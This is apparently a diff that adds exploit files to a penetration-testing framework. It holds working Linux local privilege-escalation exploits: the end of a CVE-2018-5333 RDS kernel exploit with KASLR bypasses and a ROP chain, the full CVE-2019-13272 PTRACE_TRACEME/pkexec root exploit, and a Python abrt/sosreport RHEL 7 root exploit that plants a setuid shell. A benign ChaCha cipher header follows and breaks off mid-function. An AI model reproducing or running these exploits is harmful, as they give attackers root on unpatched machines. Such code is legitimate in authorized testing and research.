+      case PERF_RECORD_UNTHROTTLE:
+      case PERF_RECORD_LOST:
+        break;
+      default:
+        dprintf("[-] unexpected perf event: %x\n", here->header.type);
+        if (child) kill(child, SIGKILL);
+              if (fd > 0) close(fd);
+        return 0;
+      }
+      progress += here->header.size;
+    }
+    /* tell the kernel we read it. */
+    meta_page->data_tail = last_head;
+  }
+
+  if (child) kill(child, SIGKILL);
+  if (fd > 0) close(fd);
+  return min_addr;
+}
+#endif
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+unsigned long get_kernel_addr_mincore() {
+  unsigned char buf[getpagesize() / sizeof(unsigned char)];
+  unsigned long iterations = 20000000;
+  unsigned long addr = 0;
+
+  dprintf("[.] trying mincore info leak...\n");
+
+  if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+    dprintf("[-] target kernel does not permit mincore info leak\n");
+    return 0;
+  }
+
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000,
+       PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+    dprintf("[-] mmap(): %m\n");
+    return 0;
+  }
+
+  int i;
+  for (i = 0; i <= iterations; i++) {
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf)) {
+      dprintf("[-] mincore(): %m\n");
+      return 0;
+    }
+
+    int n;
+    for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space */
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
+        addr &= 0xffffffffff000000ul;
+        if (munmap((void*)0x66000000, 0x20000000000))
+          dprintf("[-] munmap(): %m\n");
+        return addr;
+      }
+    }
+  }
+
+  if (munmap((void*)0x66000000, 0x20000000000))
+    dprintf("[-] munmap(): %m\n");
+
+  dprintf("[-] kernel base not found in mincore info leak\n");
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+  unsigned long addr = 0;
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+  addr = get_kernel_addr_kallsyms();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_PERF
+  addr = get_kernel_addr_perf();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+  addr = get_kernel_addr_mincore();
+  if (addr) return addr;
+#endif
+
+  dprintf("[-] KASLR bypass failed, kernel base not found\n");
+  exit(EXIT_FAILURE);
+
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static void shell() {
+  if (getuid() == 0 && geteuid() == 0) {
+    dprintf("[+] got root\n");
+    system(SHELL);
+  } else {
+    dprintf("[-] failed\n");
+  }
+  exit(EXIT_FAILURE);
+}
+
+void fork_shell() {
+  pid_t rv;
+
+  rv = fork();
+  if (rv == -1) {
+    dprintf("[-] fork(): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (rv == 0)
+    shell();
+}
+
+int main(int argc, char *argv[]) {
+  if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
+
+  dprintf("[.] checking kernel version...\n");
+  detect_versions();
+  dprintf("[~] done, version looks good\n");
+
+#if ENABLE_SYSTEM_CHECKS
+  dprintf("[.] checking system...\n");
+  check_env();
+  dprintf("[~] done, looks good\n");
+#endif
+
+  dprintf("[.] mapping null address...\n");
+  map_null();
+  dprintf("[~] done, mapped null address\n");
+
+#if ENABLE_KASLR_BYPASS
+  dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+  KERNEL_BASE = get_kernel_addr();
+  dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+  unsigned long commit_creds =        (KERNEL_BASE + kernels[kernel].commit_creds);
+  unsigned long prepare_kernel_cred = (KERNEL_BASE + kernels[kernel].prepare_kernel_cred);
+  unsigned long xor_rdi =             (KERNEL_BASE + kernels[kernel].xor_rdi);
+  unsigned long mov_rdi_rax =         (KERNEL_BASE + kernels[kernel].mov_rdi_rax);
+  unsigned long xchg_esp =            (KERNEL_BASE + kernels[kernel].xchg_esp);
+  unsigned long swapgs =              (KERNEL_BASE + kernels[kernel].swapgs);
+  unsigned long iretq =               (KERNEL_BASE + kernels[kernel].iretq);
+
+  dprintf("[.] commit_creds:        %lx\n", commit_creds);
+  dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
+
+  dprintf("[.] mmapping fake stack...\n");
+
+  uint64_t page_size = getpagesize();
+  uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
+  uint64_t stack_offset = xchg_esp % page_size;
+
+  unsigned long *fake_stack = mmap((void*)stack_aligned, 0x200000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (fake_stack == MAP_FAILED) {
+    dprintf("[-] mmap(fake_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long *temp_stack = mmap((void*)0x30000000, 0x10000000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (temp_stack == MAP_FAILED) {
+    dprintf("[-] mmap(temp_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  static unsigned long result = 0;
+  unsigned long *data = (unsigned long *)0;
+  data[1] = (uint64_t)&result;
+  data[3] = xchg_esp;
+
+  save_state();
+  debug_enable_sigsev_handler();
+
+  fake_stack = (unsigned long *)(stack_aligned + stack_offset);
+
+  int i = 0;
+
+  fake_stack[i++] = xor_rdi;
+  fake_stack[i++] = prepare_kernel_cred;
+  fake_stack[i++] = mov_rdi_rax;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = commit_creds;
+
+  fake_stack[i++] = swapgs;
+  fake_stack[i++] = 0x12345678;
+
+  fake_stack[i++] = iretq;
+  fake_stack[i++] = (unsigned long)shell;
+  fake_stack[i++] = user_cs;
+  fake_stack[i++] = user_rflags;
+  fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
+  fake_stack[i++] = user_ss;
+
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %p...\n", (void*)&shell);
+  trigger_bug();
+
+  return 0;
+}
+

data/exploits/CVE-2019-13272/Makefile

@@ -0,0 +1,4 @@
+
+all:
+	x86_64-linux-musl-cc -static -s -pie poc.c -o exploit
+

data/exploits/CVE-2019-13272/poc.c

@@ -0,0 +1,464 @@
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// Uses pkexec technique
+// ---
+// Original discovery and exploit author: Jann Horn
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
+// ---
+// <bcoles@gmail.com>
+// - added known helper paths
+// - added search for suitable helpers
+// - added automatic targeting
+// - changed target suid executable from passwd to pkexec
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
+// ---
+// Tested on:
+// - Ubuntu 16.04.5 kernel 4.15.0-29-generic
+// - Ubuntu 18.04.1 kernel 4.15.0-20-generic
+// - Ubuntu 19.04 kernel 5.0.0-15-generic
+// - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
+// - Linux Mint 17.3 kernel 4.4.0-89-generic
+// - Linux Mint 18.3 kernel 4.13.0-16-generic
+// - Linux Mint 19 kernel 4.15.0-20-generic
+// - Xubuntu 16.04.4 kernel 4.13.0-36-generic
+// - ElementaryOS 0.4.1 4.8.0-52-generic
+// - Backbox 6 kernel 4.18.0-21-generic
+// - Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
+// - Kali kernel 4.19.0-kali5-amd64
+// - Redcore 1806 (LXQT) kernel 4.16.16-redcore
+// - MX 18.3 kernel 4.19.37-2~mx17+1
+// - RHEL 8.0 kernel 4.18.0-80.el8.x86_64
+// - Debian 9.4.0 kernel 4.9.0-6-amd64
+// - Debian 10.0.0 kernel 4.19.0-5-amd64
+// - Devuan 2.0.0 kernel 4.9.0-6-amd64
+// - SparkyLinux 5.8 kernel 4.19.0-5-amd64
+// - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
+// - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
+// - Mageia 6 kernel 4.9.35-desktop-1.mga6
+// - Antergos 18.7 kernel 4.17.6-1-ARCH
+// ---
+// user@linux-mint-19-2:~$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root
+// user@linux-mint-19-2:~$ ./ptrace_traceme_root
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// [.] Checking environment ...
+// [~] Done, looks good
+// [.] Searching for known helpers ...
+// [~] Found known helper: /usr/sbin/mate-power-backlight-helper
+// [.] Using helper: /usr/sbin/mate-power-backlight-helper
+// [.] Spawning suid process (/usr/bin/pkexec) ...
+// [.] Tracing midpid ...
+// [~] Attached to midpid
+// To run a command as administrator (user "root"), use "sudo <command>".
+// See "man sudo_root" for details.
+//
+// root@linux-mint-19-2:/home/user#
+// ---
+
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stddef.h>
+#include <stdarg.h>
+#include <pwd.h>
+#include <sys/prctl.h>
+#include <sys/wait.h>
+#include <sys/ptrace.h>
+#include <sys/user.h>
+#include <sys/syscall.h>
+#include <sys/stat.h>
+#include <linux/elf.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define SAFE(expr) ({                   \
+  typeof(expr) __res = (expr);          \
+  if (__res == -1) {                    \
+    dprintf("[-] Error: %s\n", #expr);  \
+    return 0;                           \
+  }                                     \
+  __res;                                \
+})
+#define max(a,b) ((a)>(b) ? (a) : (b))
+
+/*
+ * execveat() syscall
+ * https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl
+ */
+#ifndef __NR_execveat
+#  define __NR_execveat 322
+#endif
+
+static const char *SHELL = "/bin/bash";
+
+static int middle_success = 1;
+static int block_pipe[2];
+static int self_fd = -1;
+static int dummy_status;
+static const char *helper_path;
+static const char *pkexec_path = "/usr/bin/pkexec";
+static const char *pkaction_path = "/usr/bin/pkaction";
+struct stat st;
+
+const char *helpers[1024];
+
+const char *known_helpers[] = {
+  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
+  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
+  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
+  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
+  "/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper",
+  "/usr/sbin/mate-power-backlight-helper",
+  "/usr/bin/xfpm-power-backlight-helper",
+  "/usr/bin/lxqt-backlight_backend",
+  "/usr/libexec/gsd-wacom-led-helper",
+  "/usr/libexec/gsd-wacom-oled-helper",
+  "/usr/libexec/gsd-backlight-helper",
+  "/usr/lib/gsd-backlight-helper",
+  "/usr/lib/gsd-wacom-led-helper",
+  "/usr/lib/gsd-wacom-oled-helper",
+};
+
+/* temporary printf; returned pointer is valid until next tprintf */
+static char *tprintf(char *fmt, ...) {
+  static char buf[10000];
+  va_list ap;
+  va_start(ap, fmt);
+  vsprintf(buf, fmt, ap);
+  va_end(ap);
+  return buf;
+}
+
+/*
+ * fork, execute pkexec in parent, force parent to trace our child process,
+ * execute suid executable (pkexec) in child.
+ */
+static int middle_main(void *dummy) {
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  pid_t middle = getpid();
+
+  self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
+
+  pid_t child = SAFE(fork());
+  if (child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+
+    SAFE(dup2(self_fd, 42));
+
+    /* spin until our parent becomes privileged (have to be fast here) */
+    int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
+    char *needle = tprintf("\nUid:\t%d\t0\t", getuid());
+    while (1) {
+      char buf[1000];
+      ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
+      buf[buflen] = '\0';
+      if (strstr(buf, needle)) break;
+    }
+
+    /*
+     * this is where the bug is triggered.
+     * while our parent is in the middle of pkexec, we force it to become our
+     * tracer, with pkexec's creds as ptracer_cred.
+     */
+    SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
+
+    /*
+     * now we execute a suid executable (pkexec).
+     * Because the ptrace relationship is considered to be privileged,
+     * this is a proper suid execution despite the attached tracer,
+     * not a degraded one.
+     * at the end of execve(), this process receives a SIGTRAP from ptrace.
+     */
+    execl(pkexec_path, basename(pkexec_path), NULL);
+
+    dprintf("[-] execl: Executing suid executable failed");
+    exit(EXIT_FAILURE);
+  }
+
+  SAFE(dup2(self_fd, 0));
+  SAFE(dup2(block_pipe[1], 1));
+
+  /* execute pkexec as current user */
+  struct passwd *pw = getpwuid(getuid());
+  if (pw == NULL) {
+    dprintf("[-] getpwuid: Failed to retrieve username");
+    exit(EXIT_FAILURE);
+  }
+
+  middle_success = 1;
+  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
+        helper_path,
+        "--help", NULL);
+  middle_success = 0;
+  dprintf("[-] execl: Executing pkexec failed");
+  exit(EXIT_FAILURE);
+}
+
+/* ptrace pid and wait for signal */
+static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
+  struct user_regs_struct regs;
+  struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
+  SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+  SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
+
+  /* set up indirect arguments */
+  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
+  struct injected_page {
+    unsigned long argv[2];
+    unsigned long envv[1];
+    char arg0[8];
+    char path[1];
+  } ipage = {
+    .argv = { scratch_area + offsetof(struct injected_page, arg0) }
+  };
+  strcpy(ipage.arg0, arg0);
+  int i;
+  for (i = 0; i < sizeof(ipage)/sizeof(long); i++) {
+    unsigned long pdata = ((unsigned long *)&ipage)[i];
+    SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
+                (void*)pdata));
+  }
+
+  /* execveat(exec_fd, path, argv, envv, flags) */
+  regs.orig_rax = __NR_execveat;
+  regs.rdi = exec_fd;
+  regs.rsi = scratch_area + offsetof(struct injected_page, path);
+  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
+  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
+  regs.r8 = AT_EMPTY_PATH;
+
+  SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
+  SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+
+  return 0;
+}
+
+static int middle_stage2(void) {
+  /* our child is hanging in signal delivery from execve()'s SIGTRAP */
+  pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
+  return force_exec_and_wait(child, 42, "stage3");
+}
+
+// * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * *
+
+static int spawn_shell(void) {
+  SAFE(setresgid(0, 0, 0));
+  SAFE(setresuid(0, 0, 0));
+  execlp(SHELL, basename(SHELL), NULL);
+  dprintf("[-] execlp: Executing shell %s failed", SHELL);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * *
+
+static int check_env(void) {
+  int warn = 0;
+  const char* xdg_session = getenv("XDG_SESSION_ID");
+
+  dprintf("[.] Checking environment ...\n");
+
+  if (stat(pkexec_path, &st) != 0) {
+    dprintf("[-] Could not find pkexec executable at %s\n", pkexec_path);
+    exit(EXIT_FAILURE);
+  }
+  if (stat(pkaction_path, &st) != 0) {
+    dprintf("[-] Could not find pkaction executable at %s\n", pkaction_path);
+    exit(EXIT_FAILURE);
+  }
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[-] Warning: grsec is in use\n");
+    warn++;
+  }
+  if (xdg_session == NULL) {
+    dprintf("[!] Warning: $XDG_SESSION_ID is not set\n");
+    warn++;
+  }
+  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
+    dprintf("[!] Warning: Could not find active PolKit agent\n");
+    warn++;
+  }
+  if (stat("/usr/sbin/getsebool", &st) == 0) {
+    if (system("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on") == 0) {
+      dprintf("[!] Warning: SELinux deny_ptrace is enabled\n");
+      warn++;
+    }
+  }
+
+  dprintf("[~] Done, looks good\n");
+
+  return warn;
+}
+
+/*
+ * Use pkaction to search PolKit policy actions for viable helper executables.
+ * Check each action for allow_active=yes, extract the associated helper path,
+ * and check the helper path exists.
+ */
+int find_helpers() {
+  char cmd[1024];
+  snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path);
+  FILE *fp;
+  fp = popen(cmd, "r");
+  if (fp == NULL) {
+    dprintf("[-] Failed to run: %s\n", cmd);
+    exit(EXIT_FAILURE);
+  }
+
+  char line[1024];
+  char buffer[2048];
+  int helper_index = 0;
+  int useful_action = 0;
+  static const char *needle = "org.freedesktop.policykit.exec.path -> ";
+  int needle_length = strlen(needle);
+
+  while (fgets(line, sizeof(line)-1, fp) != NULL) {
+    /* check the action uses allow_active=yes*/
+    if (strstr(line, "implicit active:")) {
+      if (strstr(line, "yes")) {
+        useful_action = 1;
+      }
+      continue;
+    }
+
+    if (useful_action == 0)
+      continue;
+    useful_action = 0;
+
+    /* extract the helper path */
+    int length = strlen(line);
+    char* found = memmem(&line[0], length, needle, needle_length);
+    if (found == NULL)
+      continue;
+
+    memset(buffer, 0, sizeof(buffer));
+    int i;
+    for (i = 0; found[needle_length + i] != '\n'; i++) {
+      if (i >= sizeof(buffer)-1)
+        continue;
+      buffer[i] = found[needle_length + i];
+    }
+
+    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
+      strstr(&buffer[0], "/cpugovctl") != 0 ||
+      strstr(&buffer[0], "/package-system-locked") != 0 ||
+      strstr(&buffer[0], "/cddistupgrader") != 0) {
+      dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]);
+      continue;
+    }
+
+    /* check the path exists */
+    if (stat(&buffer[0], &st) != 0)
+      continue;
+
+    helpers[helper_index] = strndup(&buffer[0], strlen(buffer));
+    helper_index++;
+
+    if (helper_index >= sizeof(helpers)/sizeof(helpers[0]))
+      break;
+  }
+
+  pclose(fp);
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
+
+int ptrace_traceme_root() {
+  dprintf("[.] Using helper: %s\n", helper_path);
+
+  /*
+   * set up a pipe such that the next write to it will block: packet mode,
+   * limited to one packet
+   */
+  SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
+  SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
+  char dummy = 0;
+  SAFE(write(block_pipe[1], &dummy, 1));
+
+  /* spawn pkexec in a child, and continue here once our child is in execve() */
+  dprintf("[.] Spawning suid process (%s) ...\n", pkexec_path);
+  static char middle_stack[1024*1024];
+  pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
+                            CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
+  if (!middle_success) return 1;
+
+  /*
+   * wait for our child to go through both execve() calls (first pkexec, then
+   * the executable permitted by polkit policy).
+   */
+  while (1) {
+    int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
+    char buf[16];
+    int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
+    buf[buflen] = '\0';
+    *strchrnul(buf, '\n') = '\0';
+    if (strncmp(buf, basename(helper_path), 15) == 0)
+      break;
+    usleep(100000);
+  }
+
+  /*
+   * our child should have gone through both the privileged execve() and the
+   * following execve() here
+   */
+  dprintf("[.] Tracing midpid ...\n");
+  SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
+  SAFE(waitpid(midpid, &dummy_status, 0));
+  dprintf("[~] Attached to midpid\n");
+
+  force_exec_and_wait(midpid, 0, "stage2");
+  exit(EXIT_SUCCESS);
+}
+
+int main(int argc, char **argv) {
+  if (strcmp(argv[0], "stage2") == 0)
+    return middle_stage2();
+  if (strcmp(argv[0], "stage3") == 0)
+    return spawn_shell();
+
+  dprintf("Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n");
+
+  check_env();
+
+  if (argc > 1 && strcmp(argv[1], "check") == 0) {
+    exit(0);
+  }
+
+  /* Search for known helpers defined in 'known_helpers' array */
+  dprintf("[.] Searching for known helpers ...\n");
+  int i;
+  for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
+    if (stat(known_helpers[i], &st) == 0) {
+      helper_path = known_helpers[i];
+      dprintf("[~] Found known helper: %s\n", helper_path);
+      ptrace_traceme_root();
+    }
+  }
+
+  /* Search polkit policies for helper executables */
+  dprintf("[.] Searching for useful helpers ...\n");
+  find_helpers();
+  for (i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {
+    if (helpers[i] == NULL)
+      break;
+
+    if (stat(helpers[i], &st) == 0) {
+      helper_path = helpers[i];
+      ptrace_traceme_root();
+    }
+  }
+
+  return 0;
+}

data/exploits/cve-2015-5287/sosreport-rhel7.py

@@ -0,0 +1,114 @@
+#!/usr/bin/python
+# CVE-2015-5287 (?)
+# abrt/sosreport RHEL 7.0/7.1 local root
+# rebel 09/2015
+
+# [user@localhost ~]$ python sosreport-rhel7.py
+# crashing pid 19143
+# waiting for dump directory
+# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
+# waiting for sosreport directory
+# sosreport:  sosreport-localhost.localdomain-20151130194114
+# waiting for tmpfiles
+# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
+# moving directory
+# moving tmpfiles
+# tmpurfpyY -> tmpurfpyY.old
+# tmpYnCfnQ -> tmpYnCfnQ.old
+# waiting for sosreport to finish (can take several minutes)........................................done
+# success
+# bash-4.2# id
+# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+# bash-4.2# cat /etc/redhat-release 
+# Red Hat Enterprise Linux Server release 7.1 (Maipo)
+
+import os,sys,glob,time,sys,socket
+
+payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
+
+pid = os.fork()
+
+if pid == 0:
+	os.execl("/usr/bin/sleep","sleep","100")
+
+time.sleep(0.5)
+
+print "crashing pid %d" % pid
+
+os.kill(pid,11)
+
+print "waiting for dump directory"
+
+def waitpath(p):
+	while 1:
+		r = glob.glob(p)
+		if len(r) > 0:
+			return r
+		time.sleep(0.05)	
+
+dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
+
+print "dump directory: ", dumpdir
+
+os.chdir(dumpdir)
+
+print "waiting for sosreport directory"
+
+sosreport = waitpath("sosreport-*")[0]
+
+print "sosreport: ", sosreport
+
+print "waiting for tmpfiles"
+tmpfiles = waitpath("tmp*")
+
+print "tmpfiles: ", tmpfiles
+
+print "moving directory"
+
+os.rename(sosreport, sosreport + ".old")
+os.mkdir(sosreport)
+os.chmod(sosreport,0777)
+
+os.mkdir(sosreport + "/sos_logs")
+os.chmod(sosreport + "/sos_logs",0777)
+
+os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
+os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
+
+print "moving tmpfiles"
+
+for x in tmpfiles:
+	print "%s -> %s" % (x,x + ".old")
+	os.rename(x, x + ".old")
+	open(x, "w+").write("/tmp/hax.sh\n")
+	os.chmod(x,0666)
+
+
+os.chdir("/")
+
+sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
+
+
+def trigger():
+	open("/tmp/hax.sh","w+").write(payload)
+	os.chmod("/tmp/hax.sh",0755)
+	try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
+	except: pass
+	time.sleep(0.5)
+	try:
+		os.stat("/tmp/sh")
+	except:
+		print "could not create suid"
+		sys.exit(-1)
+	print "success"
+	os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
+	sys.exit(-1)
+
+for x in xrange(0,60*10):
+	if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
+		print "done"
+		trigger()
+	time.sleep(1)
+	sys.stderr.write(".")
+
+print "timed out"

data/headers/windows/c_payload_util/chacha.h

@@ -0,0 +1,224 @@
+/*
+chacha-merged.c version 20080118
+D. J. Bernstein
+Public domain.
+*/
+
+/* $OpenBSD: chacha_private.h,v 1.2 2013/10/04 07:02:27 djm Exp $ */
+
+#include <stddef.h>
+
+typedef unsigned char u8;
+typedef unsigned int u32;
+
+typedef struct
+{
+  u32 input[16]; /* could be compressed */
+} chacha_ctx;
+
+#define U8C(v) (v##U)
+#define U32C(v) (v##U)
+
+#define U8V(v) ((u8)(v) & U8C(0xFF))
+#define U32V(v) ((u32)(v) & U32C(0xFFFFFFFF))
+
+#define ROTL32(v, n) \
+  (U32V((v) << (n)) | ((v) >> (32 - (n))))
+
+#define U8TO32_LITTLE(p) \
+  (((u32)((p)[0])      ) | \
+   ((u32)((p)[1]) <<  8) | \
+   ((u32)((p)[2]) << 16) | \
+   ((u32)((p)[3]) << 24))
+
+#define U32TO8_LITTLE(p, v) \
+  do { \
+    (p)[0] = U8V((v)      ); \
+    (p)[1] = U8V((v) >>  8); \
+    (p)[2] = U8V((v) >> 16); \
+    (p)[3] = U8V((v) >> 24); \
+  } while (0)
+
+#define ROTATE(v,c) (ROTL32(v,c))
+#define XOR(v,w) ((v) ^ (w))
+#define PLUS(v,w) (U32V((v) + (w)))
+#define PLUSONE(v) (PLUS((v),1))
+
+#define QUARTERROUND(a,b,c,d) \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
+
+static const char sigma[16] = "expand 32-byte k";
+static const char tau[16] = "expand 16-byte k";
+
+static void
+chacha_keysetup(chacha_ctx *x,const u8 *k,u32 kbits,u32 ivbits)
+{
+  const char *constants;
+
+  x->input[4] = U8TO32_LITTLE(k + 0);
+  x->input[5] = U8TO32_LITTLE(k + 4);
+  x->input[6] = U8TO32_LITTLE(k + 8);
+  x->input[7] = U8TO32_LITTLE(k + 12);
+  if (kbits == 256) { /* recommended */
+    k += 16;
+    constants = sigma;
+  } else { /* kbits == 128 */
+    constants = tau;
+  }
+  x->input[8] = U8TO32_LITTLE(k + 0);
+  x->input[9] = U8TO32_LITTLE(k + 4);
+  x->input[10] = U8TO32_LITTLE(k + 8);
+  x->input[11] = U8TO32_LITTLE(k + 12);
+  x->input[0] = U8TO32_LITTLE(constants + 0);
+  x->input[1] = U8TO32_LITTLE(constants + 4);
+  x->input[2] = U8TO32_LITTLE(constants + 8);
+  x->input[3] = U8TO32_LITTLE(constants + 12);
+}
+
+static void
+chacha_ivsetup(chacha_ctx *x,const u8 *iv)
+{
+  x->input[12] = 1;
+  x->input[13] = U8TO32_LITTLE(iv + 0);
+  x->input[14] = U8TO32_LITTLE(iv + 4);
+  x->input[15] = U8TO32_LITTLE(iv + 8);
+}
+
+static void
+chacha_encrypt_bytes(chacha_ctx *x,const u8 *m,u8 *c,u32 bytes)
+{
+  u32 x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15;
+  u32 j0, j1, j2, j3, j4, j5, j6, j7, j8, j9, j10, j11, j12, j13, j14, j15;
+  u8 *ctarget = NULL;
+  u8 tmp[64];
+  u32 i;
+
+  if (!bytes) return;
+
+  j0 = x->input[0];
+  j1 = x->input[1];
+  j2 = x->input[2];
+  j3 = x->input[3];
+  j4 = x->input[4];
+  j5 = x->input[5];
+  j6 = x->input[6];
+  j7 = x->input[7];
+  j8 = x->input[8];
+  j9 = x->input[9];
+  j10 = x->input[10];
+  j11 = x->input[11];
+  j12 = x->input[12];
+  j13 = x->input[13];
+  j14 = x->input[14];
+  j15 = x->input[15];
+
+  for (;;) {
+    if (bytes < 64) {
+      for (i = 0;i < bytes;++i) tmp[i] = m[i];
+      m = tmp;
+      ctarget = c;
+      c = tmp;
+    }
+    x0 = j0;
+    x1 = j1;
+    x2 = j2;
+    x3 = j3;
+    x4 = j4;
+    x5 = j5;
+    x6 = j6;
+    x7 = j7;
+    x8 = j8;
+    x9 = j9;
+    x10 = j10;
